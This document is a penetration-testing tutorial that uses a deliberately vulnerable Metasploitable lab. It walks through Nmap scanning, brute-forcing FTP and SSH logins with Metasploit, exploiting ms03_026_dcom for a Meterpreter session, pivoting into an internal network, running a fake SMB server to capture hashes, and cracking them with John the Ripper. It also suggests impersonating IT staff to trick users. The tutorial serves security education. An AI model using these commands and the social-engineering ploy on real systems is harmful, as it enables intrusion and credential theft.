Now that we’ve covered the Metasploit basics, let us dig into the more advanced features of Metasploit. We’ll go in-depth into some brute force attacks by running an Nmap command to map out all publicly available services on a remote IP, and then we’ll look at pivoting! Lastly, we’ll look at what you can do to set up some fake service, like SMB (Service Message Block) to catch user hashed credentials and crack the passwords of the hashes.
But first, we need to install Metasploitable. It's a virtual machine made vulnerable on purpose so that it can be used specifically for penetration testing and hacking. We are going to add it to our VirtualBox list and make some network configuration to it so that we can use it for some parts of this guide.
First off, head over to SourceForge to download the Metasploitable image: https://sourceforge.net/projects/metasploitable/?source=typ_redirect
Then, extract the files somewhere on your computer. Open up VirtualBox and add a new Virtual Machine.
In the prompt that pops up, choose a name and select the Linux 64-bit type and version.
Choose a RAM size. I chose 4GB, which I would recommend as a minimum.
When chosing a hard disk drive, select the Metasploitable.vmdk that you extracted before.
And you’re almost done! Open up the newly created virtual machine and go to its settings. Select the networking category and change the first adapter to Host-only. Yours may look a little different depending on what physical network devices you have on your computer, but it should still be relatively similar.
Now you can go ahead and start the machine. When it boots, it’ll ask you for a login and password, which is msfadmin for both the username and password. Now, go ahead and run the command ifconfig to see what IP address were assigned to your machine.
As you can see, my IP address is 192.168.1.150.
If you’ve scribbled down your IP address, you’re done with this machine. We don’t need to configure the Metasploitable VM any further, because it already has some public services running that we’re going to scan with the help of Nmap in our Kali machine. Let Metasploitable sit running in the background for now.
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Source
Sounds awesome, doesn’t it? Simply explained, Nmap can find out if a remote host is running SSH, FTP, HTTP, or any other service that could be a victim of brute force attacks. So, how do we use it?
Nmap comes pre-installed with Kali Linux and to find out what services a certain IP address is running. We’re going to scan the IP address we had on the Metasploitable machine. So run the following command (using the ip address from above):
nmap -sS 192.168.1.150
As we can see, there are many open services running on the Metasploitable VM, but we’re mainly interested in port 21 and 22, which is FTP and SSH respectively. In the next steps, let’s try brute forcing out way in to the FTP and SSH service.
Remember to never run Nmap towards an unauthorized system.
So, you’ve found out that FTP is running on a server. How do you gain access to it? First, find a password dictionary or a combined username and password dictionary, many of which are available here: https://github.com/duyetdev/bruteforce-database
Simply download the one that you want to try out and place it somewhere in your home directory.
Then, open up Metasploit and type
use auxiliary/scanner/ftp/ftp_login
This will load the FTP module into Metasploit. Now, you need to set the directory of where you put the dictionary and set the remote host IP address. Again, we’re going to use the IP address of the remote server (192.168.1.150 in my case). Then, simply run the brute force attack. All commands can be found below.
set USERPASS_FILE /root/userpass_dictionary.txtset RHOSTS 192.168.1.150run
When choosing the dictionary, you must make sure to set the correct file type. For instance, my dictionary contained both usernames and passwords, and so USERPASS_FILE is used. If you only got one username but lots of passwords, you can use PASS_FILE instead.
As you can see, the login attempt is successful after it has parsed through the file. This is done very quickly, within a fraction of a second. So, be careful where you post your passwords! Never use the same password twice and always opt in for two-factor authentication if possible.
To attack the SSH service, you do it in a similar fashion, but instead of the FTP scanner, you use:
auxiliary/scanner/ssh/ssh_login
And this time, let’s say you do know the username but you don’t know the password. Instead of using a USERPASS_FILE, we could simply rely on the PASS_FILE command and set the username manually, like below!
set PASS_FILE /root/pass_dictionary.txtset RHOSTS 192.168.1.150set USERNAME userrun
As you can see, the correct login for the SSH service on 192.168.1.150 is “user” for the username and “user” for the password!
There are many other types of brute forcing scanners, like:
A pivoting attack is a technique which lets the attacker route his traffic from an accessible network to an inaccessible network. Imagine we had the following scenario:
A malicious attacker has access to a company’s publicly open Web Server at the network 192.168.1.0/24. The Web Server in turn has access to the internal network at 192.168.56.0/24, which includes a private File Server. If the attacker wants access to the File Server, he could exploit the Web Server who has access to both networks, to lurk his way in to the company secrets.
To understand this more easily, look at the image below.
To set this scenario up, we’re going to need some preparation!
To execute the pivoting attacks, we’re going to use Meterpreter. Meterpreter can be described as an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. A DLL (Dynamically Linked Library) is simply a library of code and data that is modular — i.e. it can be used by any number of programs at the same time.
DLL injection refers to a technique where a program can be run "within the address space of another process by forcing it to load a dynamic-link library. DLL injection is often used by external programs to influence the behavior of another program in a way its authors did not anticipate or intend." Source
Since we need to exploit the victim system (the Web Server) somehow, we’re going to use the exploit ms03_026_dcom, which is a stack buffer overflow exploit used in the RPCSS service found on Windows 2000, Windows XP, and Windows 2003. Luckily, Metasploit already has this exploit built in to use with the Meterpreter payload.
Issue the following commands once you know the victim operating system and its IP address. You can use Nmap to find out both.
use exploit/windows/dcerpc/ms03_026_dcomset PAYLOAD windows/meterpreter/bind_tcpset RHOST 192.168.1.197exploit -j
In the above prompt window, we can clearly see that Meterpreter has successfully established a connection to the Web Server by running the exploit against it. Now, once we have a foothold in the Web Server machine, we can issue commands and do all other kinds of things locally on that server! However, to do that, you need to create a session by writing:
sessions -i 1
The number at the end of the command represents the session ID. If you look at the picture above, my session ID was 1. You can create several sessions against the target machine, just as I have done in the picture below, where I used a session ID of 2 instead.
Once you’ve established a session, you can verify what networks the Web Server has access to. You can type in the command ipconfig, and you’ll see all networks talking with the server:
Now, to gain access to the private network, we need to add a route to it (a Pivot), so our session knows where to send our traffic. Issue the following command while still holding the session active.
run autoroute -s 192.168.56.0/24run autoroute -p
You can see that I also ran a -p flag to see that the route is actually active.
Now that you have a Pivot to the private network, you can do all sorts of things with it. We, on the other hand, will try scanning for ports. Since we know it’s a file server, it would make some sense if port 21 (FTP) was open, but we’ll also scan for port 22 (SSH) for good measure.
To do such, you must put the session in the background. Then, open the port scanner and scan the whole private network after open ports. Increase your threads to decrease search time.
backgrounduse auxiliary/scanner/portscan/tcpset RHOSTS 192.168.56.0/24set PORTS 21, 22set THREADS 50run
Let’s suppose we want to figure out what passwords the managers are running on the Web Server. We could create a fake Service Message Block (SMB) server for sharing access to files, printers, serial ports and other resources, to lure the domain users to use it and capture their credentials in the form of hashes while we’re at it. Then, once you have the hashes, you can crack them with John The Ripper.
To set up the fake SMB service with Metasploit, enter the following commands:
use auxiliary/server/capture/smbset JOHNPWFILE /root/tmpexploit
You’ll now have the fake SMB, but you need to send it out to the target system. You can do so by checking up your current IP address:
So, now we know that we have the IP address of 192.168.1.112 (yours may vary). If the target system were to enter
net use \\192.168.1.112
they would send their hashed credential over to our server without they ever suspecting a thing.
You may wonder “how would we force the target system to enter this command?”.
It can be done in various ways, but the easiest one would probably be by social engineering, to simply trick the user to enter this command into his/her command prompt by acting as an IT administrator or the like.
Below, I have entered the command on a Windows 2000 server, and as we can see, the server doesn’t really recognize the SMB service, but that’s OK! Remember, it’s all an illusion, so it won’t matter for the target system.
However, if we go back to Metasploit, we’ll see that the SMB has successfully captured some credentials!
These credentials are saved in a file, normally found under /root/tmp_netntlm, and you can verify it by listing all files in that directory.
And if we check its content, we can see that it holds the exact same hashes as we captured earlier.
We can see that the username is Administrator, but the hashes are not exactly plaintext. We can use John The Ripper to crack the hash and convert it into a plaintext password. You can run John The Ripper by simply running the following query:
john tmp_netntlm
This will automatically find the appropriate hashing algorithm and crack the hashes into plaintext. Below, we can see that we found a match of the hash, namely 12345. So, the username Administrator had the password 12345 on the server!
